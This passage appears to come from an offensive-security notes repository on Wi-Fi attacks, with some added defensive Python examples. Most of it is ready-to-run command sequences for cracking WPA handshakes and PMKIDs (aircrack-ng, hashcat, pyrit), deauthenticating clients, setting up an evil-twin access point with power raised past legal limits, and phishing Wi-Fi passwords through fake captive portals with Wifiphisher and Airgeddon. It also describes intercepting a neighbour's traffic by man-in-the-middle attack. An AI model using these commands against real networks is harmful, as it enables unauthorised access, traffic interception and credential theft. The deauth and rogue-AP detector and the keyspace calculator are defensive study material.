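            self.parts.append(data)


WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]*")   # assumed word shape: letters, then alphanumerics


def site_words(html, min_length=6):
    """Word counts from a page's visible text (the -m / -c behaviour of cewl)."""
    extractor = TextExtractor()
    extractor.feed(html)
    text = " ".join(extractor.parts)
    return Counter(w for w in WORD_RE.findall(text) if len(w) >= min_length)


def site_words_in_password(password, words):
    """Site-derived words (case-insensitive) that occur inside a candidate password."""
    lowered = password.lower()
    return sorted({w for w in words if w.lower() in lowered}, key=str.lower)


if __name__ == "__main__":
    words = site_words(SAMPLE_HTML)
    print(words.most_common(5))
    print(site_words_in_password("Falcon2024!", words))
```

Wired into a password-change hook with the real site crawled at the depth cewl's `-d` would use, the check rejects `Falcon2024!` before a wordlist does; a passphrase with no site words passes.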
--------------------------------------------------------------------------------
/tools/wordlists/cupp.md:
--------------------------------------------------------------------------------
1 | # CUPP
2 |
3 | Interactive wordlist generator based on a person's profile.
4 |
5 | Help:
6 |
7 | python3 cupp.py -h
8 |
9 | Interactive:
10 |
11 | python3 cupp.py -i
--------------------------------------------------------------------------------
/tools/wordlists/wordlists.md:
--------------------------------------------------------------------------------
1 | https://wiki.skullsecurity.org/Passwords
2 |
3 | http://contest-2010.korelogic.com/wordlists.html
4 |
5 | https://weakpass.com/wordlist
6 |
7 | ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/
--------------------------------------------------------------------------------
/wifi/crack.md:
--------------------------------------------------------------------------------
1 | # Wifi Crack
2 |
3 | ## Aircrack: (Hash)
4 |
5 | aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk\*.cap
6 |
7 | ## Reaver: (PSK)
8 |
9 | reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
10 | reaver -i wlan0mon -b -c -K 1 -vv
11 |
12 | ## Crunch & Aircrack:
13 |
14 | crunch 8 8 0123456789 -s 00000000 -e 99999999 | aircrack-ng -e test proof.cap -w -
15 |
16 | Use john to keep a session of aircrack when used with huge wordlist:
17 |
18 | crunch 8 8 | john --stdin --stdout --session=sessname | aircrack-ng -b C0:25:E9:62:CE:E5 psk-01.cap -w -
19 |
20 |
21 | ## John & Aircrack:
22 |
23 | john --wordlist=password.lst --rules=Jumbo --stdout | aircrack-ng -b C0:25:E9:62:CE:E5 psk-01.cap -w -
24 |
25 | Use john to keep a session of aircrack when used with huge wordlist:
26 |
27 | john --wordlist=password.lst --rules=Jumbo --stdout --session=sessname | aircrack-ng -b C0:25:E9:62:CE:E5 psk-01.cap -w -
28 |
29 | https://wpa-sec.stanev.org/
30 | https://github.com/danielmiessler/SecLists
31 |
32 | ## Pyrit:
33 |
34 | Pyrit is one of the fastest tools available for WPA password-cracking out there.
35 |
36 | One helpful tool is the strip command, which strips down long capture files to only include relevant packets. And then there's the verify option that lets Pyrit confirm results via recomputation.
37 |
38 | Pyrit also has several features to import multiple password lists into a large database. To prevent duplicates, the import_unique_passwords command can also strip out passwords that appear multiple times in the same file we're trying to import. After we import passwords to the database, we can start cracking them with the attack_batch option.
39 |
40 | Download a Password List & Benchmark System:
41 |
42 | wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt
43 |
44 | pyrit benchmark (benchmark our system)
45 |
46 | pyrit -i '/root/Desktop/probable-v2-wpa-top4800.txt' import_passwords (import passwords to the database)
47 |
48 | Capture handshakes:
49 |
50 | airmon-ng start wlan0
51 | airodump-ng wlan0mon -c 3 -w capture
52 | pyrit -r '/root/Desktop/capture-01.cap' analyze (analyse captured file to show if we have a valid handshake)
53 |
54 | Final command:
55 |
56 | pyrit -r capture.pcap -o savedpass attack_batch
57 |
58 | ## hcxtools & Hashcat
59 |
60 | In this case we use hcxtools & Hashcat to capture packets and crack the password, but we can do that automatically with wifite: if the necessary software is installed, Wifite will automatically use it and give us a URL to upload the captured handshakes. The password cracking is then performed online by the connected servers using different password lists.
61 |
62 | Install hcxtools & Hashcat:
63 |
64 | sudo apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev
65 |
66 | MacOs Install:
67 |
68 | brew install hashcat hcxtools
69 |
70 | On your Git folder:
71 |
72 | git clone https://github.com/ZerBea/hcxdumptool.git
73 | cd hcxdumptool
74 | sudo make
75 | sudo make install
76 |
77 | On your Git folder:
78 |
79 | git clone https://github.com/ZerBea/hcxtools.git
80 | cd hcxtools
81 | sudo make
82 | sudo make install
83 |
84 | apt install hashcat
85 |
86 | Use hcxdumptool to capture PMKIDs from local networks:
87 |
88 | airmon-ng start wlan0
89 |
90 | hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
91 |
92 | -i tells the program which interface we are using, in this case, wlan0mon. The filename we'll be saving the results to can be specified with the -o flag argument. The channel we want to scan on can be indicated with the -c flag followed by the number of the channel to scan.
93 |
94 | Use hcxpcaptool to convert the dump for Hashcat:
95 |
96 | To convert our PCAPNG file, we'll use hcxpcaptool with a few arguments specified. In the same folder that your .PCAPNG file is saved, run the following command in a terminal window.
97 |
98 | hcxpcaptool -z hash capture.pcapng
99 |
100 | hcxpcaptool -E essidlist -I identitylist -U usernamelist -z hash capture.pcapng
101 |
102 | This command is telling hcxpcaptool to use the information included in the file to help Hashcat understand it with the -E, -I, and -U flags. The -z flag is used for the name of the newly converted file for Hashcat to use, and the last part of the command is the PCAPNG file we want to convert.
103 |
104 | Select a Password List & Brute Force with Hashcat:
105 |
106 | hashcat -m 16800 --force hash /home/user/Downloads/rockyou.txt.txt -w 4 -a 0
107 |
108 | hashcat -m 16800 --force hash /home/user/Downloads/rockyou.txt.txt > out.txt
109 |
110 | hashcat -m 16800 --force hash /home/user/Downloads/rockyou.txt.txt --show
111 |
112 | Newer Hashcat (mode 22000):
113 |
114 | hashcat -m 22000 -a 3 --session session_name /Users/nicolasgrimonpont/Hash '?1?1?1?1?1?1?1?1' -1 '?l?u?d'
115 |
116 | This is a mask attack:
117 | - -m 22000 (new WPA hash mode)
118 | - '?1?1?1?1?1?1?1?1' (mask: 8 positions)
119 | - -1 '?l?u?d' (custom charset 1): lowercase, uppercase, digits
120 |
121 | - '?2?2?2?2?2?2?2?2' (mask: 8 positions)
122 | - -2 '?l?u?d' (custom charset 2): lowercase, uppercase, digits
123 |
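The mask notation above defines the keyspace exactly, and that number is what a defender needs to size a PSK policy: eight positions drawn from a 62-character custom charset is 62^8 candidates. The following is an added Python example, not part of this repository or of Hashcat, that parses a mask with its `-1`..`-4` custom charsets, counts the candidates, and converts the count into time at a given rate. The hash rate used in the main block is an assumed figure for illustration, not a measurement.

```python
import string

# hashcat's built-in charsets, represented as sets of byte values so ?b can join them.
BUILTIN = {
    "l": set(string.ascii_lowercase.encode()),
    "u": set(string.ascii_uppercase.encode()),
    "d": set(string.digits.encode()),
    "s": set((" " + string.punctuation).encode()),   # 33 symbols
    "h": set(b"0123456789abcdef"),
    "H": set(b"0123456789ABCDEF"),
    "b": set(range(256)),
}
BUILTIN["a"] = BUILTIN["l"] | BUILTIN["u"] | BUILTIN["d"] | BUILTIN["s"]   # 95 printable


def tokenize(mask):
    """Split a mask into ('?', 'l'), ('?', '1') or ('lit', 'x') tokens; ?? is a literal ?."""
    tokens, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            nxt = mask[i + 1]
            tokens.append(("lit", "?") if nxt == "?" else ("?", nxt))
            i += 2
        else:
            tokens.append(("lit", mask[i]))
            i += 1
    return tokens


def expand_charset(spec, custom):
    """Characters covered by a -1/-2/-3/-4 definition such as '?l?u?d' or 'abc?d'."""
    chars = set()
    for kind, value in tokenize(spec):
        if kind == "lit":
            chars.add(ord(value))
        elif value in BUILTIN:
            chars |= BUILTIN[value]
        elif value in custom:
            chars |= expand_charset(custom[value], custom)
        else:
            raise ValueError(f"unknown charset ?{value}")
    return chars


def mask_keyspace(mask, custom=None):
    """Number of candidates a mask enumerates, e.g. 62**8 for ?1 x8 with -1 '?l?u?d'."""
    custom = custom or {}
    total = 1
    for kind, value in tokenize(mask):
        if kind == "lit":
            continue                        # a literal position contributes one choice
        if value in BUILTIN:
            total *= len(BUILTIN[value])
        elif value in custom:
            total *= len(expand_charset(custom[value], custom))
        else:
            raise ValueError(f"unknown charset ?{value}")
    return total


def seconds_to_exhaust(keyspace, hashes_per_second):
    """Worst-case time to try every candidate at a steady rate."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    ASSUMED_RATE = 1_000_000     # assumed WPA rate (H/s) for illustration only
    space = mask_keyspace("?1?1?1?1?1?1?1?1", {"1": "?l?u?d"})
    years = seconds_to_exhaust(space, ASSUMED_RATE) / (365 * 24 * 3600)
    print(f"{space:,} candidates, about {years:.1f} years at {ASSUMED_RATE:,} H/s")
```

Reading the policy side off the numbers: adding one position to the same charset multiplies the work by 62, while keeping eight positions and adding `?s` (95 symbols, mask `?a`) only by about 1.5 per position; length buys far more than symbol variety, and the page's own `--dict` wordlists are the more realistic threat against short human-chosen PSKs.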
124 |
125 | In this command, we are starting Hashcat in 16800 mode, which is for attacking WPA-PMKID-PBKDF2 network protocols. Next, we'll specify the name of the file we want to crack, in this case, "HC.16800." The -a flag tells us which types of attack to use, in this case, a "straight" attack, and then the -w and --kernel-accel=1 flags specifies the highest performance workload profile. If your computer suffers performance issues, you can lower the number in the -w argument.
126 |
127 | Next, the --force option ignores any warnings to proceed with the attack, and the last part of the command specifies the password list we're using to try to brute force the PMKIDs in our file, in this case, called "topwifipass.txt."
128 |
129 | Online cracking:
130 |
131 | https://gpuhash.me/
132 |
--------------------------------------------------------------------------------
/wifi/fake_ap.md:
--------------------------------------------------------------------------------
1 | # Fake Wifi AP
2 |
3 | ## MitmAP:
4 |
5 | On Git folder:
6 |
7 | git clone https://github.com/xdavidhu/mitmAP
8 | cd mitmAP
9 | ip a (info about interface)
10 | python3 mitmAP.py (execute)
11 |
12 | ## Aircrack-ng:
13 |
14 | Scan the network and wait for a client to connect to it.
15 |
16 | iwconfig
17 | airmon-ng start wlan0
18 | airodump-ng wlan0mon
19 |
20 | Create a new AP with same SSID & MAC address
21 |
22 | airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 11 mon0
23 |
24 | where 00:09:5B:6F:64:1E is the BSSID, Elroy is the SSID, and -c 11 is the channel of the suspect's AP.
25 |
26 | Deauthentication or Bumping Him Off:
27 |
28 | aireplay-ng --deauth 0 -a 00:09:5B:6F:64:1E mon0
29 |
30 | Note that we once again used his BSSID in the aireplay-ng command. If our signal is stronger than his own AP, he will automatically reconnect to our evil twin!
31 |
32 | Turn Up the Power:
33 |
34 | iwconfig wlan0 txpower 27
35 |
36 | This command will boost our power output to the maximum legally allowed in the United States, 27 dBm or 500 milliwatts.
37 |
38 | In some cases, even boosting power to 500 mWs may prove to be inadequate. If we try to turn up the power to the maximum on our Alfa wireless cards—1,000 mWs or 30 dBm—we get the error message below (some of the newer cards can actually transmit at 2,000 mWs or four times what is legally allowable in the U.S.).
39 |
40 | iwconfig wlan0 txpower 30
41 |
42 | This next step is illegal in the U.S., so be careful using it unless you have specific permission or are a member of law enforcement.
43 |
44 | Every nation has its own set of Wi-Fi regulations. Some allow more power and more channels than the U.S. For instance, Bolivia allows the use of channel 12 and a full 1,000 mWs of power. We can get our Alfa card to use Bolivian regulations by simply typing:
45 |
46 | iw reg set BO
47 |
48 | Now that we are in Bolivian regulatory domain, we can boost our power to its maximum by typing:
49 |
50 | iwconfig wlan0 txpower 30
51 | iwconfig (check output)
52 |
53 | Now that we have our neighbor connected to our AP, we can take the next steps toward detecting his activity.
54 |
55 | We can use software like Ettercap to conduct a man-in-the middle attack. This way, we can intercept, analyze, and even inject traffic to this user. In other words, because he has connected to our AP, we have almost total access to his data both coming and going. If he really is downloading or selling child porn, we can intercept it.
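The evil-twin recipe above and the deauthentication step in the Wireshark notes leave two traces in the air that a monitor-mode sensor can see without any key: a burst of deauthentication frames carrying the real AP's address, and a second beacon source for the same SSID (the same BSSID on another channel, as `airbase-ng -a ... -c 11` produces, or an unknown BSSID). The following is an added Python example, not part of this repository, that applies both rules to constructed management-frame records. The known-AP inventory, the frame timings, the five-frames-per-second deauth threshold and the BSSIDs reused from the page are assumptions for the example.

```python
from collections import defaultdict, deque

# Known access points, SSID -> {(BSSID, channel)}; assumed inventory for the example.
KNOWN_APS = {"HomeNet": {("00:14:6c:7e:40:80", 6)}}

# Constructed management-frame records (seconds, subtype, transmitter/BSSID, SSID,
# channel) as a monitor-mode capture would yield them after parsing.
LEGIT_BSSID = "00:14:6C:7E:40:80"
SAMPLE_FRAMES = (
    [(0.0 + i * 0.1, "beacon", LEGIT_BSSID, "HomeNet", 6) for i in range(3)]
    + [(1.0 + i * 0.05, "deauth", LEGIT_BSSID, None, 6) for i in range(8)]   # burst
    + [(2.0, "beacon", LEGIT_BSSID, "HomeNet", 11),            # same BSSID, other channel
       (2.1, "beacon", "02:11:22:33:44:55", "HomeNet", 11),    # unknown BSSID, same SSID
       (2.2, "beacon", LEGIT_BSSID, "HomeNet", 6)]             # the real AP, still fine
)


def detect_wifi_anomalies(frames, known_aps=KNOWN_APS, deauth_threshold=5, window=1.0):
    """Return (time, alert_type, detail) for deauth floods and unexpected beacon sources."""
    alerts = []
    deauth_times = defaultdict(deque)      # BSSID -> timestamps inside the sliding window
    flooding = set()                       # BSSIDs already reported for a flood
    seen_beacons = set()                   # (BSSID, channel) pairs already reported
    for t, subtype, bssid, ssid, channel in frames:
        bssid = bssid.lower()
        if subtype == "deauth":
            times = deauth_times[bssid]
            times.append(t)
            while times and t - times[0] > window:
                times.popleft()
            if len(times) >= deauth_threshold and bssid not in flooding:
                flooding.add(bssid)
                alerts.append((t, "deauth_flood",
                               f"{len(times)} deauth frames from {bssid} within {window}s"))
        elif subtype == "beacon" and ssid in known_aps:
            key = (bssid, channel)
            if key in known_aps[ssid] or key in seen_beacons:
                continue
            seen_beacons.add(key)
            known_channels = {ch for b, ch in known_aps[ssid] if b == bssid}
            if known_channels:
                alerts.append((t, "bssid_on_unexpected_channel",
                               f"{bssid} ({ssid}) on channel {channel}, expected {sorted(known_channels)}"))
            else:
                alerts.append((t, "unknown_bssid_for_ssid",
                               f"{bssid} advertises {ssid} on channel {channel}"))
    return alerts


if __name__ == "__main__":
    for t, kind, detail in detect_wifi_anomalies(SAMPLE_FRAMES):
        print(f"t={t:.2f} {kind}: {detail}")
```

The flood fires on the fifth deauth inside one second, and each rogue beacon source is reported once. Detection is the fallback; the fix is 802.11w (Protected Management Frames), under which clients ignore the unauthenticated deauth frames the evil-twin step depends on.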
--------------------------------------------------------------------------------
/wifi/frameworks.md:
--------------------------------------------------------------------------------
1 | # Wifi Frameworks
2 |
3 | ## Wifite
4 |
5 | https://github.com/derv82/wifite2
6 |
7 | ## Airgeddon
8 |
9 | https://github.com/v1s1t0r1sh3r3/airgeddon
10 |
11 | ## Lazy Script
12 |
13 | https://github.com/arismelachroinos/lscript
14 |
15 | ## Bettercap
16 |
17 | https://github.com/bettercap/bettercap
--------------------------------------------------------------------------------
/wifi/phishing.md:
--------------------------------------------------------------------------------
1 | # Wifi Phishing
2 |
3 | ## Wifiphisher:
4 |
5 | Install it with one of these two methods:
6 |
7 | - apt install wifiphisher (direct install)
8 |
9 | - git clone https://github.com/wifiphisher/wifiphisher.git (from git repository)
10 | - cd wifiphisher
11 | - sudo python setup.py install
12 |
13 | Use:
14 |
15 | - wifiphisher --help
16 | - sudo wifiphisher -i wlan0 (no monitor mode)
17 |
18 | - select the network (from GUI)
19 | - select 'Firmware Upgrade Page'
20 |
21 | After selecting the attack, it will immediately launch. A page will open to monitor for targets joining the network. Wifiphisher will also listen for devices trying to connect to networks that aren't present, and it will create fake versions to lure those devices into connecting.
22 |
23 | After a target joins, a pop-up will demand they enter the password.
24 |
25 | When the target enters the password, we're notified in the Wifiphisher screen.
26 |
27 | ## Airgeddon:
28 |
29 | - apt-get install ccze
30 |
31 | On your git folder:
32 |
33 | - git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
34 | - cd airgeddon
35 | - sudo bash ./airgeddon.sh
36 |
37 | Then from interactive console:
38 |
39 | - Install any missing packages manually if necessary with apt-get install "package name"
40 |
41 | - Select an interface to work with
42 | - Press 2 and Enter to put your wireless card into monitor mode
43 | - Next, select option 7 and Enter for the "Evil Twin attacks" menu
44 | - Select option 9 and Enter for the "Evil Twin AP attack with a captive portal"
45 | - Select the number of the target you wish to attack, and press Enter to proceed to the next screen.
46 | - Select 2 Deauth aireplay attack
47 | - No need to spoof MAC address
48 | - Get a handshake
49 | - Do a deauthentication attack
50 | - and continue running the script to the end
51 |
52 | Now, if we don't already have a handshake for this network, we'll have to capture one now.
53 |
54 | Once the capture process has started, a window with red text sending deauth packets and a window with white text listening for handshakes will open. You'll need to wait until you see "WPA Handshake:" and then the BSSID address of your targeted network. In the example below, we're still waiting for a handshake.
55 |
56 | Once you see that you've got the handshake, you can exit the Capturing Handshake window. When the script asks if you got the handshake, select Y and save the handshake file. Next, select the location to write the captured password to, and you're ready for the final step of configuring the phishing page.
57 |
58 | Set up the phishing page; when someone connects to the fake network you'll get the password.
--------------------------------------------------------------------------------
/wifi/sniffing.md:
--------------------------------------------------------------------------------
1 | # Wifi Sniffing
2 |
3 | ## Airmon
4 |
5 | ```bash
6 | airmon-ng
7 | airmon-ng start wlan0
8 | airmon-ng stop wlan0mon
9 | airmon-ng start wlan0 9 (channel 9)
10 | ```
11 |
12 | Disable all network services for monitor mode:
13 |
14 | ```bash
15 | airmon-ng check kill
16 | ```
17 |
18 | ## Airodump
19 |
20 | ```bash
21 | airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk wlan0mon
22 | ```
23 |
24 | ## Aireplay
25 |
26 | ```bash
27 | aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon
28 | ```
29 |
30 | ## Airdecap-ng
31 |
32 | ```bash
33 | airdecap-ng -e 'the ssid' -p passphrase tkip.cap
34 | ```
35 |
36 | The capture file must contain a valid four-way handshake. For this purpose having (packets 2 and 3) or (packets 3 and 4) will work correctly. In fact, you don't truly need all four handshake packets.
37 |
38 | As well, only data packets following the handshake will be decrypted. This is because information is required from the handshake in order to decrypt the data packets.
39 |
40 | ## Wash
41 |
42 | Can be used to check whether WPS is enabled on a router
43 |
44 | ```bash
45 | sudo wash -i wlan0mon
46 | ```
47 |
48 | ## Wifite
49 |
50 | Automated tool to get the handshakes of all the networks we scan.
51 |
52 | Can be used with other software to upload the handshakes in a special format to a website that cracks the Wi-Fi password using many connected servers.
53 |
54 | ```bash
55 | sudo wifite --dict '/home/kali/Downloads/custom-smprepchar-app0-100.txt' --clients-only --power 27 --bully --wps --infinite -p 30
56 | ```
57 |
58 | ### Infinite mode
59 |
60 | Loop and continue after each attack (scan for 60 seconds).
61 |
62 | ```bash
63 | sudo wifite -inf -mac -p 60 --kill --clients-only --no-wps --no-pmkid --skip-crack
64 | ```
65 |
66 | ### Pillage mode
67 |
68 | Attack all wireless networks with connected clients after a 5 minute scan.
69 |
70 | ```bash
71 | sudo wifite -mac -p 300 --kill --clients-only --no-wps --no-pmkid --skip-crack
72 | ```
73 |
74 | ## Hxcdump
75 |
76 | Use hcxdumptool to capture PMKIDs from local networks:
77 |
78 | ```bash
79 | sudo airmon-ng start wlan0
80 |
81 | sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
82 | ```
83 |
84 | ## Lazy Script
85 |
86 | ```bash
87 | cd (back to user folder)
88 | git clone https://github.com/arismelachroinos/lscript.git
89 | cd lscript
90 | chmod +x install.sh
91 | ./install.sh
92 | ```
93 |
94 |
95 | ## Bettercap
96 |
97 | Get handshakes easily for all networks
98 |
99 | ```bash
100 | sudo bettercap --iface wlan1mon
101 | help wifi
102 | wifi.recon on (wifi sniffing)
103 | wifi.show
104 | wifi.deauth all (deauthenticate every client)
105 | set wifi.handshakes '/desiredfolderlocation' (choose the directory for handshakes)
106 |
107 | wifi.assoc all (PMKID Attack) (use all or MAC address)
108 | wifi.show
109 | ```
110 |
--------------------------------------------------------------------------------